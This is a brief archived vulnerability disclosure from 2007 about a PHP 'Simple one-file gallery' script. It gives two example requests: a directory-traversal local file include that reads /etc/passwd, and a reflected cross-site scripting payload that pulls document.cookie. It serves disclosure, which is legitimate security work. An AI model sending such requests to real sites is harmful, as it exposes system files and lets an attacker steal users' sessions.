OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Simple one-file gallery

nonenone.com
Date: Fri Feb 23 2007 - 15:35:31 CST


local file include:
/gallery.php?f=../../../../../../../../../../../../etc/passwd

xss via php error :
/gallery.php?f=</textarea>'"><script>alert(document.cookie)</script>

regards laurent gaffié